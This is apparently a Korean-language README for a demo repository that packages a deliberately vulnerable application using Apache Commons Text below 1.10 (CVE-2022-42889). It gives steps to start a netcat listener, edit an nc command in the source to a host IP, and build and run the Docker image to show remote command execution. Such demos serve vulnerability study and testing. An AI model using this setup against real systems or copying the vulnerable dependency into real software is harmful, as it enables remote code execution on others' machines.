
이 저장소는 CVE-2022-42889에 취약한 Apache Commons Text < 1.10을 사용하는 간단한 애플리케이션을 포함합니다.
DemoApplication.java의 nc 명령을 호스트 IP 주소로 바꾸세요.
netcat으로 수신 대기:
$ nc -l -p 30000
취약한 도커 코드 빌드 및 실행
docker build . -t vulnerable-app
docker run vulnerable-app
보시다시피 netcat이 원격 명령을 실행할 수 있습니다.